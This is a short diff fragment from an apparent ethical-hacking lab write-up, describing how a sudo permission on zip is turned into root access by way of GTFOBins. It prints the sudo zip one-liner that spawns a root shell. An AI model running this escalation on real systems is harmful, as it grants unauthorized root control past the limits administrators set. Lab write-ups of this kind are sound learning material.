TheMaster-2/EthicalHackingWriteUps/index.md

 So the above means I can run zip as root

 So goto GTFOBINS

 https://gtfobins.github.io/

 search for ZIP, and get the sudo one

-type commands one line at a time
+I typed commands one line at a time

 ```markdown
 TF=$(mktemp -u)
 sudo zip $TF /etc/hosts -T -TT 'sh #'